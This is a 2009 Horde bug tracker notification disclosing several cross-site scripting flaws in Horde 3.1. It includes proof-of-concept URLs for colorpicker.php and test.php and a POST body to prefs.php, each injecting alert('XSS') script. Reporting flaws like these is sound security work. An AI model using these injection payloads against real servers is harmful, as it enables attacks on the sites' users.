[Tickets #8399] Multiple Cross Site Scripting Vulnerabilities
bugs at horde.org
bugs at horde.org
Fri Jul 3 18:48:49 UTC 2009
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8399
------------------------------------------------------------------------------
Ticket | 8399
Created By | security at davidwharton.us
Summary | Multiple Cross Site Scripting Vulnerabilities
Queue | Horde Base
Version | 3.1
Type | Bug
State | Unconfirmed
Priority | 2. Medium
Milestone |
Patch |
Owners |
------------------------------------------------------------------------------
security at davidwharton.us (2009-07-03 14:48) wrote:
Multiple cross site scripting vulnerabilites exist. Proof of concepts:
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on
More information about the bugs
mailing list